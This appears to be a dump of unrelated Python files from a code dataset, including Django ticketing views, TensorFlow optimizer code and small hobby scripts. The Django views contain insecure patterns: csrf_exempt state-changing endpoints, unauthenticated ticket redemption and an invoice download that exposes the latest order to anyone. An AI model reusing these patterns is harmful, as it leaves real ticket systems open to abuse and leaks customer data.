razorpay_client.order.create(dict(amount=amount*100,\n currency=order_currency,\n payment_capture='0'))\n\n order = Order.objects.create(\n\n \n user_name=user_name,\n event_id=event_id,\n event_name=event_name,\n ticket_count=ticket_count,\n ticket_type=ticket_type,\n event_From=event_From,\n amount=total_amount,\n provider_order_id=razorpay_order['id'],\n email=user_email,\n user_phone=user_phone,\n payment_event_id=payment_event_id\n )\n order.save()\n razorpay_order_id = razorpay_order['id']\n callback_url = \"/razorpay/payment/\"\n context = {}\n context['razorpay_order_id'] = razorpay_order_id\n context['razorpay_merchant_key'] = get_razor_key_id()\n context['razorpay_amount'] = amount\n context['currency'] = order_currency\n context['callback_url'] = callback_url\n # context['order'] = order\n\n return JsonResponse(context)\n\n\ndef freepay(request):\n event_name = request.POST.get('event_name')\n ticket_count = request.POST.get('ticket_count')\n ticket_type = request.POST.get('ticket_type')\n user_name = request.POST.get('user_name')\n event_id = request.POST.get('event_id')\n payment_event_id = request.POST.get('event_id')\n user_email = request.POST.get('email')\n user_phone = request.POST.get('phone')\n event_From = Event.objects.get(event_id=payment_event_id)\n event_From = event_From.Event_from.strftime('%Y-%m-%d %H:%M:%S')\n # random generate 16 character ticket\n ticket = ''.join(random.choices(\n string.ascii_uppercase + string.ascii_lowercase, k=16))\n \n order = Order.objects.create(\n\n \n user_name=user_name,\n event_id=event_id,\n event_name=event_name,\n ticket_count=ticket_count,\n ticket_type='Base',\n event_From=event_From,\n amount=0,\n provider_order_id=ticket,\n email=user_email,\n user_phone=user_phone,\n payment_event_id=payment_event_id,\n status='success',\n payment_id=ticket\n\n\n )\n event_location = EventLocation.objects.get(location_id=order.event_id)\n order.location_link = event_location.location_link\n temp_hash= generate_hash(order)\n temp_generate_url = generate_url(temp_hash)\n invoive_qrcode(temp_generate_url,order)\n order.save_hash = temp_hash\n order.save_url = temp_generate_url\n order.save()\n \n event = Event.objects.get(event_id=order.event_id)\n test.convert_to_pdf(order,get_host_companyName(request),event_location,event)\n Mail_send(order,str(get_host_email()),order.email,str(get_host_password()))\n \n# subject = 'Event Management Payment'\n# message = f'''Hi {order.user_name}, thank you for registering in Event.\n\n# your order is successfully placed.\n \n# order id: {order.provider_order_id} \n# order amount: {int(order.amount)}/- rupees only\n# order status: {order.status}\n# Phone number: {order.user_phone}\n \n \n \n# '''\n# email_from = get_host_email()\n# recipient_list = [order.email]\n# email = EmailMessage(subject, message, email_from, recipient_list)\n# fd = open(\"invoice.pdf\", 'rb')\n# email.attach(\"invoice.pdf\", fd.read(), 'application/pdf')\n# email.send()\n\n return JsonResponse({'status': 'success'})\n\n\ndef success(request):\n return render(request, 'frontend/sucess.html')\n\n@csrf_exempt\ndef customer_view(request):\n \n url = request.build_absolute_uri()\n\n query_params = urlparse(url).query\n params_dict = dict(parse_qs(query_params))\n\n data = params_dict.get('data')\n\n\n if request.method == \"POST\":\n data = json.loads(request.POST.get('data')) \n print(\",,,,,,,,,,,,,,,,,,,,,,\",data)\n try:\n ticket = Order.objects.get(payment_id=data['id'])\n print(ticket)\n\n if ticket:\n ticket.ticket_used = 'Yes'\n ticket.save()\n return HttpResponse(\"True\")\n except:\n return HttpResponse(\"Error\")\n\n\n if data:\n \n try:\n print(\"try\",data[0])\n ticket = Order.objects.get(save_hash=data[0])\n if ticket:\n context = {\n \"ticket_sale\": ticket,\n }\n return render(request,'frontend/ticket_view.html',context)\n except: \n return render(request,'frontend/ticket_fail_view.html')\n return HttpResponse(str(request.build_absolute_uri()))\n\n# The `chart` function is defined to generate Column 2D chart from database.\ndef analysis_view(request):\n # Chart data is passed to the `dataSource` parameter, as dict, in the form of key-value pairs.\n dataSource = {}\n dataSource['chart'] = {\n \"caption\": \"Total Sales of each Event\",\n \"subCaption\": \"\",\n \"xAxisName\": \"Events\",\n \"yAxisName\": \"Ticket remaining\",\n \"numberPrefix\": \"Ps. \",\n \"theme\": \"fusion\"\n\n \n }\n\n # The data for the chart should be in an array where each element of the array is a JSON object\n # having the `label` and `value` as key value pair.\n\n dataSource['data'] = []\n # Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.\n for key in Event.objects.all():\n if key.is_deleted == False:\n data = {}\n data['label'] = key.name\n data['value'] = key.total_count-key.remain_tickets\n dataSource['data'].append(data)\n\n # Create an object for the Column 2D chart using the FusionCharts class constructor\n column2D = FusionCharts(\"column2D\", \"ex1\" , \"600\", \"350\", \"chart-1\", \"json\", dataSource)\n return render(request, 'frontend/analysis.html', {'output': column2D.render()})\n\ndef sysconfigs():\n return redirect('/admin/event_management_application/systemconfigs/1/change/')\n\ndef redeemed(request):\n return render(request,'frontend/redeemed.html')\n\n@csrf_exempt\ndef contact_us(request):\n print(request.POST.get('contact_subject'))\n email = request.POST.get('contact_email')\n name = request.POST.get('contact_name')\n phone= request.POST.get('contact_phone')\n subject = request.POST.get('contact_subject') + email\n message = \" Email from \"+ email + \" Name: \"+ name + \" Phone: \"+ phone\n send_mail(subject, message, email, [get_host_email()], fail_silently=False)\n return JsonResponse({'status': 'success'})\n\n\n\n# Define function to download pdf file using template\ndef download_pdf_file(request):\n paymentid = Order.objects.last().payment_id\n filename = f'{paymentid}.pdf'\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n filepath = BASE_DIR + '/static/invoices/' + filename\n path = open(filepath, 'rb')\n mime_type, _ = mimetypes.guess_type(filepath)\n response = HttpResponse(path, content_type=mime_type)\n response['Content-Disposition'] = \"attachment; filename=%s\" % filename\n return response\n\n\n@csrf_exempt\ndef recent_transactions(request):\n \n\n email = request.POST.get('email')\n events = Order.objects.all().order_by('-created_on')\n items_per_page = 10\n paginator = Paginator(events, items_per_page)\n page_number = request.GET.get('page')\n try:\n page_obj = paginator.get_page(page_number)\n except PageNotAnInteger:\n page_obj = paginator.get_page(1)\n except EmptyPage:\n page_obj = paginator.get_page(paginator.num_pages)\n context = {\n 'events': events,\n 'email': email,\n 'page_obj': page_obj,\n }\n\n return render(request, 'frontend/recent_transactions.html', context)\n\n\n@csrf_exempt\ndef choices(request):\n if request.method == 'POST':\n event_dates = request.POST.get('event_dates')\n print(event_dates) \n return HttpResponse(\"success\")","repo_name":"JashKakadiya/event_management_","sub_path":"event_management_application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2492469613","text":"#!/usr/bin/env python3\nimport os\n\ndepth = 9\nrlist = list(range(depth))\n\nren = {}\nfor i in rlist:\n ren[i] = {}\n\nfor f in os.listdir('.'):\n if '.log.' in f:\n p = f.split('.')\n ip = int(p[-1])\n if 1 <= ip < depth:\n ren[ip][f] = '{}.log.{}'.format(p[0], ip+1)\n elif f.endswith('.log'):\n ren[0][f] = '{}.1'.format(f)\n\nprint(ren)\n\nfor i in reversed(rlist):\n for old, new in ren[i].items():\n os.rename(old, new)","repo_name":"rohe/oidctest","sub_path":"test_tool/cp/test_op/tool/rotate_logs.py","file_name":"rotate_logs.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"11640500633","text":"from model import GameTheoryModel\nfrom mesa.visualization.modules import CanvasGrid, ChartModule\nfrom mesa.visualization.ModularVisualization import ModularServer\n\nGLOBAL_WIDTH = 10\nGLOBAL_HEIGHT = 10\n\n\ndef agent_portrayal(agent):\n portrayal = {\"Filled\": \"true\",\n \"Layer\": 1}\n\n if agent.type == \"AlwaysShare\":\n portrayal[\"Color\"] = \"green\"\n portrayal[\"r\"] = 0.8\n portrayal[\"Shape\"] = \"circle\"\n elif agent.type == \"AlwaysSteal\":\n portrayal[\"Color\"] = \"red\"\n portrayal[\"r\"] = 0.8\n portrayal[\"Shape\"] = \"circle\"\n elif agent.type == \"Food\":\n portrayal[\"Shape\"] = \"rect\"\n portrayal[\"w\"] = 1\n portrayal[\"h\"] = 1\n portrayal[\"Layer\"] = 0\n\n if agent.fully_grown:\n portrayal[\"Color\"] = \"orange\"\n else:\n portrayal[\"Color\"] = \"black\"\n\n return portrayal\n\n\ngrid = CanvasGrid(agent_portrayal, GLOBAL_WIDTH, GLOBAL_HEIGHT, 300, 300)\nchart = ChartModule([{\"Label\": \"Ratio of Share vs Steal\",\n \"Color\": \"Black\"}],\n data_collector_name='datacollector')\nserver = ModularServer(GameTheoryModel,\n [grid, chart],\n \"Game Theory Sim\",\n {\"n_share\": 15,\n \"n_steal\": 15,\n \"n_food\": 50,\n \"width\": GLOBAL_WIDTH, \"height\": GLOBAL_HEIGHT})\n\nserver.port = 8521\nserver.launch()\n","repo_name":"MrHaiss/GameTheorySim","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11020162277","text":"import six\n\nimport tensorflow as tf\n\n\nclass MixedPrecisionOptimizerWrapper(tf.train.Optimizer):\n def __init__(self, optimizer, loss_scale=None):\n super(MixedPrecisionOptimizerWrapper, self).__init__(\n optimizer._use_locking,\n optimizer._name + '-MP',\n )\n self._optimizer = optimizer\n self._fp32_to_fp16 = {}\n self._loss_scaler = None\n if loss_scale is None:\n self._loss_scale = 1.0\n elif isinstance(loss_scale, float):\n self._loss_scale = loss_scale\n elif isinstance(loss_scale, AutomaticLossScaler):\n self._loss_scaler = loss_scale\n self._loss_scale = self._loss_scaler.loss_scale\n\n def compute_gradients(self, loss, var_list=None,\n gate_gradients=tf.train.Optimizer.GATE_OP,\n aggregation_method=None,\n colocate_gradients_with_ops=False,\n grad_loss=None):\n loss *= self._loss_scale\n grads_and_vars_fp16 = self._optimizer.compute_gradients(\n loss, var_list=var_list,\n gate_gradients=gate_gradients,\n aggregation_method=aggregation_method,\n colocate_gradients_with_ops=colocate_gradients_with_ops,\n grad_loss=grad_loss,\n )\n\n # collecting regularization functions\n reg_var_funcs = tf.get_collection('REGULARIZATION_FUNCTIONS')\n reg_funcs = dict(map(lambda x: (x[0].name, x[1]), reg_var_funcs))\n\n # creating FP-32 variables and filling the fp32 dict\n grads_and_vars_fp32 = []\n with tf.variable_scope('FP32-master-copy'):\n for grad, var in grads_and_vars_fp16:\n if var.dtype.base_dtype == tf.float16:\n fp32_var = tf.Variable(\n initial_value=tf.cast(var.initialized_value(), tf.float32),\n name=var.name.split(':')[0],\n expected_shape=var.shape,\n dtype=tf.float32,\n trainable=False,\n # necessary for cudnn_rnn layers which have unknown shape\n validate_shape=bool(var.get_shape()),\n collections=[tf.GraphKeys.GLOBAL_VARIABLES,\n \"FP32_MASTER_COPIES\"],\n )\n self._fp32_to_fp16[fp32_var.name] = var\n fp32_grad = tf.cast(grad, tf.float32)\n # adding regularization part with respect to fp32 copy\n if var.name in reg_funcs:\n fp32_grad += self._loss_scale * tf.gradients(\n # pylint: disable=no-member\n tf.contrib.layers.apply_regularization(\n reg_funcs[var.name],\n [fp32_var],\n ),\n fp32_var,\n )[0]\n grads_and_vars_fp32.append((fp32_grad, fp32_var))\n else:\n grads_and_vars_fp32.append((grad, var))\n\n grads_and_vars_fp32 = _scale_grads(grads_and_vars_fp32,\n 1.0 / self._loss_scale)\n return grads_and_vars_fp32\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None):\n def apply_ops_wrapper():\n update_op = self._optimizer.apply_gradients(grads_and_vars,\n global_step, name)\n apply_ops = []\n with tf.control_dependencies([update_op]):\n for grad, var in grads_and_vars:\n if var.name in self._fp32_to_fp16:\n dst_var = self._fp32_to_fp16[var.name]\n apply_ops.append(\n tf.assign(dst_var, tf.saturate_cast(var, tf.float16))\n )\n if apply_ops:\n return tf.group(apply_ops)\n return update_op\n\n if self._loss_scaler:\n grad_has_nans, grad_amax = AutomaticLossScaler.check_grads(grads_and_vars)\n should_skip_update = tf.logical_or(tf.is_inf(grad_amax), grad_has_nans)\n loss_scale_update_op = self._loss_scaler.update_op(grad_has_nans,\n grad_amax)\n with tf.control_dependencies([loss_scale_update_op]):\n return tf.cond(should_skip_update, tf.no_op, apply_ops_wrapper)\n else:\n return apply_ops_wrapper()\n\n\ndef _scale_grads(grads_and_vars, scale):\n scaled_grads_and_vars = []\n for grad, var in grads_and_vars:\n if grad is not None:\n if isinstance(grad, tf.IndexedSlices):\n grad_values = grad.values * scale\n grad = tf.IndexedSlices(grad_values, grad.indices, grad.dense_shape)\n else:\n grad *= scale\n scaled_grads_and_vars.append((grad, var))\n return scaled_grads_and_vars\n\n\nclass AutomaticLossScaler(object):\n SUPPORTED_ALGOS = ['backoff', 'logmax']\n\n def __init__(self, algorithm='Backoff', params=None):\n algorithm = algorithm.lower().strip()\n if algorithm == 'backoff':\n self.scaler = BackoffScaler(params)\n elif algorithm == 'logmax':\n self.scaler = LogMaxScaler(params) # ppf(.999)\n else:\n raise ValueError('Unknown scaling algorithm: {}'.format(algorithm))\n\n def update_op(self, has_nan, amax):\n return self.scaler.update_op(has_nan, amax)\n\n @property\n def loss_scale(self):\n return self.scaler.loss_scale\n\n @staticmethod\n def check_grads(grads_and_vars):\n has_nan_ops = []\n amax_ops = []\n\n for grad, _ in grads_and_vars:\n if grad is not None:\n if isinstance(grad, tf.IndexedSlices):\n x = grad.values\n else:\n x = grad\n\n has_nan_ops.append(tf.reduce_any(tf.is_nan(x)))\n amax_ops.append(tf.reduce_max(tf.abs(x)))\n\n has_nan = tf.reduce_any(has_nan_ops)\n amax = tf.reduce_max(amax_ops)\n return has_nan, amax\n\n\nclass BackoffScaler(object):\n def __init__(self, params):\n if params is None:\n params = {}\n self.scale_min = params.get('scale_min', 1.0)\n self.scale_max = params.get('scale_max', 2.**24)\n self.step_factor = params.get('step_factor', 2.0)\n self.step_window = params.get('step_window', 2000)\n\n self.iteration = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.int64)\n self.last_overflow_iteration = tf.Variable(initial_value=-1,\n trainable=False,\n dtype=tf.int64)\n self.scale = tf.Variable(initial_value=self.scale_max,\n trainable=False)\n\n def update_op(self, has_nan, amax):\n def overflow_case():\n new_scale_val = tf.clip_by_value(self.scale / self.step_factor,\n self.scale_min, self.scale_max)\n scale_assign = tf.assign(self.scale, new_scale_val)\n overflow_iter_assign = tf.assign(self.last_overflow_iteration,\n self.iteration)\n with tf.control_dependencies([scale_assign, overflow_iter_assign]):\n return tf.identity(self.scale)\n\n def scale_case():\n since_overflow = self.iteration - self.last_overflow_iteration\n should_update = tf.equal(since_overflow % self.step_window, 0)\n def scale_update_fn():\n new_scale_val = tf.clip_by_value(self.scale * self.step_factor,\n self.scale_min, self.scale_max)\n return tf.assign(self.scale, new_scale_val)\n return tf.cond(should_update,\n scale_update_fn,\n lambda: self.scale)\n\n iter_update = tf.assign_add(self.iteration, 1)\n overflow = tf.logical_or(has_nan, tf.is_inf(amax))\n\n update_op = tf.cond(overflow,\n overflow_case,\n scale_case)\n with tf.control_dependencies([update_op]):\n return tf.identity(iter_update)\n\n @property\n def loss_scale(self):\n return self.scale\n\n\nclass LogMaxScaler(object):\n def __init__(self, params):\n if params is None:\n params = {}\n self.scale_min = params.get('scale_min', 1.0)\n self.scale_max = params.get('scale_max', 2.**24)\n self.log_max = params.get('log_max', 16.)\n self.beta1 = params.get('beta1', 0.99)\n self.beta2 = params.get('beta2', 0.999)\n self.overflow_std_dev = params.get('overflow_std_dev', 3.09)\n\n self.iteration = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.int64)\n self.scale = tf.Variable(initial_value=1.0,\n trainable=False)\n self.x_hat = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.float32)\n self.slow_x_hat = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.float32)\n self.xsquared_hat = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.float32)\n self.b1_correction = tf.Variable(initial_value=1.,\n trainable=False,\n dtype=tf.float32)\n self.b2_correction = tf.Variable(initial_value=1.,\n trainable=False,\n dtype=tf.float32)\n\n # NB: assumes that `amax` is already has been downscaled\n def update_op(self, has_nan, amax):\n is_nonfinite = tf.logical_or(has_nan, tf.is_inf(amax))\n x = tf.cond(is_nonfinite,\n lambda: tf.pow(2., self.log_max),\n lambda: tf.log(amax) / tf.log(tf.constant(2.)))\n\n x_hat_assn = tf.assign(self.x_hat, self.beta1 * self.x_hat +\n (1 - self.beta1) * x)\n b1_corr_assn = tf.assign(self.b1_correction,\n self.b1_correction * self.beta1)\n with tf.control_dependencies([x_hat_assn, b1_corr_assn]):\n mu = self.x_hat.read_value() / (1 - self.b1_correction.read_value())\n\n slow_x_hat_assn = tf.assign(self.slow_x_hat, self.beta2 * self.slow_x_hat +\n (1 - self.beta2) * x)\n xsquared_hat_assn = tf.assign(\n self.xsquared_hat,\n self.beta2 * self.xsquared_hat + (1 - self.beta2) * (x * x),\n )\n b2_corr_assn = tf.assign(self.b2_correction,\n self.b2_correction * self.beta2)\n with tf.control_dependencies([slow_x_hat_assn, xsquared_hat_assn,\n b2_corr_assn]):\n e_xsquared = self.xsquared_hat.read_value() / \\\n (1 - self.b2_correction.read_value())\n slow_mu = self.slow_x_hat.read_value() / \\\n (1 - self.b2_correction.read_value())\n\n sigma2 = e_xsquared - (slow_mu * slow_mu)\n sigma = tf.sqrt(tf.maximum(sigma2, tf.constant(0.)))\n\n log_cutoff = sigma * self.overflow_std_dev + mu\n log_difference = 16 - log_cutoff\n proposed_scale = tf.pow(2., log_difference)\n scale_update = tf.assign(\n self.scale,\n tf.clip_by_value(proposed_scale, self.scale_min, self.scale_max),\n )\n iter_update = tf.assign_add(self.iteration, 1)\n\n with tf.control_dependencies([scale_update]):\n return tf.identity(iter_update)\n\n @property\n def loss_scale(self):\n return self.scale\n\n\n# The following function(s) are not under the NVIDIA license:\n\ndef get_loss_scale_from_params(params):\n \"\"\"Returns the loss scale argument from user parameters.\n\n Args:\n params: A dictionary containing the user parameters.\n\n Returns:\n A value that can be passed to the\n :class:`opennmt.optimizers.mixed_precision_wrapper.MixedPrecisionOptimizerWrapper`\n :obj:`loss_scale` constructor argument.\n \"\"\"\n loss_scale = params.get(\"loss_scale\")\n if loss_scale is None:\n return AutomaticLossScaler()\n if not isinstance(loss_scale, six.string_types):\n return loss_scale\n return AutomaticLossScaler(\n algorithm=loss_scale, params=params.get(\"loss_scale_params\"))\n","repo_name":"iriscxy/VMSMO","sub_path":"opennmt/optimizers/mixed_precision_wrapper.py","file_name":"mixed_precision_wrapper.py","file_ext":"py","file_size_in_byte":11676,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"18118426819","text":"#!/bin/python3\n\nimport numpy as np\n\n\ndef fuel(mass):\n\n '''Returns the necessary fuel to launch a module. '''\n\n fuel = np.floor(mass/3) - 2\n\n return fuel\n \n\nif __name__ == '__main__':\n\n # open input file and create list\n with open('input.txt') as f:\n flist = f.read().splitlines() \n modules = [int(bar) for bar in flist]\n\n # compute the amount of fuel required (result) \n total_fuel = fuel(np.array(modules))\n result = np.sum(total_fuel)\n\n # write result to output file\n with open(\"output.txt\", \"a\") as out:\n out.write(str(result))\n\n\n","repo_name":"anacamargos11/AdventOfCode","sub_path":"Day1/Part1/day1_part1.py","file_name":"day1_part1.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72573701654","text":"#!/usr/bin/env python\n\nimport rospy\nimport pickle\nfrom ar_track_alvar_msgs.msg import AlvarMarkers, AlvarMarker\n\n\nFLAG = 1\n\ndef wait_for_time():\n \"\"\"Wait for simulated time to begin.\n \"\"\"\n while rospy.Time().now().to_sec() == 0:\n pass\n\n\ndef callback(msg):\n markers = msg.markers\n for marker in markers:\n if marker.id == 1 and FLAG:\n filename = \"ar_1_pose\"\n outfile = open(filename, 'wb')\n pickle.dump(marker, outfile)\n outfile.close()\n print(\"SAVE\")\n# infile = open(filename, 'rb')\n# obj = pickle.load(infile)\n# infile.close()\n\ndef main():\n rospy.init_node('resave')\n wait_for_time()\n filename = \"/home/dell/catkin_ws/src/fetch-picker/final_pick_and_place/data/ar_1_pose\"\n infile = open(filename, 'rb')\n obj = pickle.load(infile)\n infile.close()\n print(obj)\n outfile = open(\"/home/dell/catkin_ws/src/fetch-picker/final_pick_and_place/data/ar_2_pose\", 'wb')\n pickle.dump(obj, outfile, 2)\n outfile.close()\n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","repo_name":"QueenieOhYeah/Fetch_pick_and_place","sub_path":"final_pick_and_place/scripts/resave.py","file_name":"resave.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37436613257","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .import views\n\nurlpatterns = [\n path('', views.all_collectables, name='collectables'),\n path('/',\n views.collectable_detail, name='collectable_detail'),\n path('add/', views.add_collectable, name='add_collectable'),\n path('sell_collectable/', views.sell_collectable, name='sell_collectable'),\n path('edit//',\n views.edit_collectable, name='edit_collectable'),\n path('delete//',\n views.delete_collectable, name='delete_collectable'),\n path('reviews/', views.reviews, name='reviews'),\n]\n","repo_name":"Lornavav/retro-revolution","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4043074381","text":"# Load the Keras NN from the h5 and json config files\n# Open the file with uproot\nimport os,sys\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import model_from_json\nimport numpy as np\nimport uproot\nimport csv\n\narchitecture_filepath = \"models/architecture_same_filters.json\"\nweights_filepath = \"models/weights_same_filters.h5\"\nscale_filepath = \"models/scaling_parameters_same_filters_3tags_only.csv\"\ndata_filepath = \"user.jagrundy.20736236._000001.MiniNTuple.root\" \n\n# First, read the csv to get the offsets and scales for each input\noffset = {\"pt\":[],\"eta\":[],\"phi\":[]}\nscale = {\"pt\":[],\"eta\":[],\"phi\":[]}\nwith open(scale_filepath) as csvfile:\n scale_reader = csv.reader(csvfile,delimiter=\",\")\n row_count=0\n for row in scale_reader:\n if row_count < 4:\n row_count+=1\n continue\n offset[\"pt\"].append(-float(row[0])) \n offset[\"eta\"].append(-float(row[2])) \n offset[\"phi\"].append(-float(row[4])) \n scale[\"pt\"].append(1/np.sqrt(float(row[1])))\n scale[\"eta\"].append(1/np.sqrt(float(row[3])))\n scale[\"phi\"].append(1/np.sqrt(float(row[5])))\n\n# Horribly inefficient, but whatever, it's meant to be a quick check\nevents = uproot.open(data_filepath)[\"XhhMiniNtuple\"]\nnn_inputs = []\nevent_count=0\nfor pts,etas,phis,tags in zip(events.array(\"resolvedJets_pt\"), \\\n events.array(\"resolvedJets_eta\"), \\\n events.array(\"resolvedJets_phi\"), \\\n events.array(\"resolvedJets_is_DL1r_FixedCutBEff_77\")):\n # Only consider 3-tag events\n if sum(tags) != 3:\n continue\n # Loop over all the untagged jets in the event, up to 7, and save the scaled pt,eta,phi\n event_pts,event_etas,event_phis = [],[],[]\n notag_i = 0\n for i in range(len(tags)):\n if not tags[i]:\n event_pts.append( (pts[i] +offset[\"pt\"][notag_i]) *scale[\"pt\"][notag_i] )\n event_etas.append( (etas[i]+offset[\"eta\"][notag_i])*scale[\"eta\"][notag_i] )\n event_phis.append( (phis[i]+offset[\"phi\"][notag_i])*scale[\"phi\"][notag_i] )\n notag_i += 1\n if notag_i == 7: \n break\n # If we ended up with less than 7 jets, do zero-padding\n while notag_i < 7:\n event_pts.append(offset[\"pt\"][notag_i]*scale[\"pt\"][notag_i])\n event_etas.append(offset[\"eta\"][notag_i]*scale[\"eta\"][notag_i])\n event_phis.append(offset[\"phi\"][notag_i]*scale[\"phi\"][notag_i])\n notag_i += 1\n nn_inputs.append(np.array(event_pts+event_etas+event_phis))\n # Only do the first few events for testing\n if event_count == 3:\n break\n event_count+=1\nnn_inputs = np.array(nn_inputs) # Has to be numpy array, not list\n\n# Load and run the model\nmodel = model_from_json(open(architecture_filepath,'r').read())\nmodel.load_weights(weights_filepath)\nscores = model.predict(nn_inputs)\n\nfor i in range(len(nn_inputs)):\n print(\"Event\",i)\n print(\"Inputs\",nn_inputs[i])\n print(\"Outputs\")\n for j in range(len(scores[i])):\n print(\" \",j,round(scores[i][j],4))\n print(\"\")\n","repo_name":"callum-mccracken/bbb","sub_path":"todd_comparison/todd.py","file_name":"todd.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30466446797","text":"# IMPORTING THE MODULE TURTLE\nimport turtle\n\n# SETTING UP THE SCREEN\nscreen = turtle.Screen()\nscreen.bgcolor('black')\n# SETTING UP TURTLE 1.0\nsally = turtle.Turtle()\nsally.color('white')\n\nsally.speed(10)\n\n# LOOP THAT REPEATS 180 TIMES\nfor i in range(180):\n sally.forward(100)\n sally.right(30)\n sally.forward(20)\n sally.left(60)\n sally.forward(50)\n sally.right(30)\n \n sally.penup()\n sally.setposition(0, 0)\n sally.pendown()\n \n sally.right(2)\n \n# AFTER THE LOOP REPEATS 180 TIMES, THE TURTLE STOPS AND HIDES\nturtle.done()\nsally.hideturtle()\n# DOING THE BORDER\npin = turtle.Turtle()\npin.color('white')\n\npin.penup()\npin.goto(-170, 170)\n\npin.speed(10)\npin.pendown()\n\nfor i in range(9):\n for i in range(40):\n pin.forward(20)\n pin.left(170)\n \n pin.penup()\n pin.left(38)\n pin.forward(40)\n pin.pendown()\n\nturtle.done()\npin.hideturtle()\n# THIS WAS FOR THE SECOND SET OF BORDERS\nsue = turtle.Turtle()\nsue.color('white')\nsue.penup()\nsue.goto(170, 170)\nsue.forward(5)\nsue.right(90)\nsue.forward(40)\n\nsue.speed(10)\nsue.pendown()\n\nfor i in range(7):\n for i in range(40):\n sue.forward(20)\n sue.left(170)\n \n sue.penup()\n sue.left(38)\n sue.forward(40)\n sue.pendown()\n\nsue.penup()\nsue.right(60)\nsue.forward(5)\nsue.pendown()\n\nfor i in range(40):\n sue.forward(20)\n sue.left(170)\n\nturtle.done()\nsue.hideturtle()\n#THIS IS FOR THIRD SET OF BORDERS\nbee = turtle.Turtle()\nbee.color('white')\nbee.penup()\nbee.goto(170, -170)\nbee.forward(5)\nbee.right(180)\nbee.forward(40)\n\nbee.speed(10)\nbee.pendown()\n\nfor i in range(8):\n for i in range(40):\n bee.forward(20)\n bee.left(170)\n \n bee.penup()\n bee.left(38)\n bee.forward(40)\n bee.pendown()\n \nturtle.done()\nbee.hideturtle()\n# IT'S THE LAST PART OF THE BORDER\nbob = turtle.Turtle()\nbob.color('white')\nbob.penup()\nbob.goto( -170, -170)\nbob.forward(5)\nbob.left(90)\nbob.forward(40)\n\nbob.speed(10)\nbob.pendown()\n\nfor i in range(7):\n for i in range(40):\n bob.forward(20)\n bob.left(170)\n \n bob.penup()\n bob.left(38)\n bob.forward(40)\n bob.pendown()\n \nturtle.done()\nbob.hideturtle()\n","repo_name":"leopardshade123/turtle-designs","sub_path":"bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21483156833","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Python支持多继承\n super().__init__(),根据mro继承链的顺序,一步步的向上继承,确保每个类只会被调用self一次\n\n GrandSon init start\n Son1 init start\n Son2 init start\n Parent init start\n Parent init end\n Son2 init end\n Son1 init end\n GrandSon init end\n (, , , , )\n\n\"\"\"\n\n\nclass Parent(object):\n def __init__(self, name, *args, **kwargs):\n print(\"Parent init start\")\n self.name = name\n print(\"Parent init end\")\n\n\nclass Son1(Parent):\n def __init__(self, name, sex, *args, **kwargs):\n print(\"Son1 init start\")\n super().__init__(name, *args, **kwargs)\n self.sex = sex\n print(\"Son1 init end\")\n\n\nclass Son2(Parent):\n def __init__(self, name, age, *args, **kwargs):\n print(\"Son2 init start\")\n super().__init__(name, *args, **kwargs)\n self.age = age\n print(\"Son2 init end\")\n\n\nclass GrandSon(Son1, Son2):\n def __init__(self, name, age, sex, *args, **kwargs):\n print(\"GrandSon init start\")\n super().__init__(name, age, sex, *args, **kwargs)\n print(\"GrandSon init end\")\n\n\nif __name__ == '__main__':\n gs = GrandSon(\"lily\", 18, \"woman\", \"China\")\n print(GrandSon.__mro__)\n","repo_name":"huanmengmie/python_study","sub_path":"base_test/extend/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72824148054","text":"from collections import deque\r\n\r\n\r\ndef bfs(x, y):\r\n visited = [[False] * M for __ in range(N)]\r\n safe[x][y] = 0\r\n visited[x][y] = True\r\n q = deque([(x, y, 0)])\r\n while q:\r\n qx, qy, c = q.popleft()\r\n for dx, dy in D:\r\n nx = qx + dx\r\n ny = qy + dy\r\n if 0 <= nx < N and 0 <= ny < M:\r\n if not visited[nx][ny]:\r\n safe[nx][ny] = min(safe[nx][ny], c + 1)\r\n visited[nx][ny] = True\r\n q.append((nx, ny, c + 1))\r\n\r\n\r\nD = [(1, 0), (0, 1), (1, 1), (-1, 0), (0, -1), (-1, -1), (1, -1), (-1, 1)]\r\nN, M = map(int, input().split())\r\nshark = [[*map(int, input().split())] for __ in range(N)]\r\nsafe = [[int(1e9)] * M for __ in range(N)]\r\n\r\nfor i in range(N):\r\n for j in range(M):\r\n if shark[i][j] == 1:\r\n bfs(i, j)\r\n\r\nprint(max(map(max, 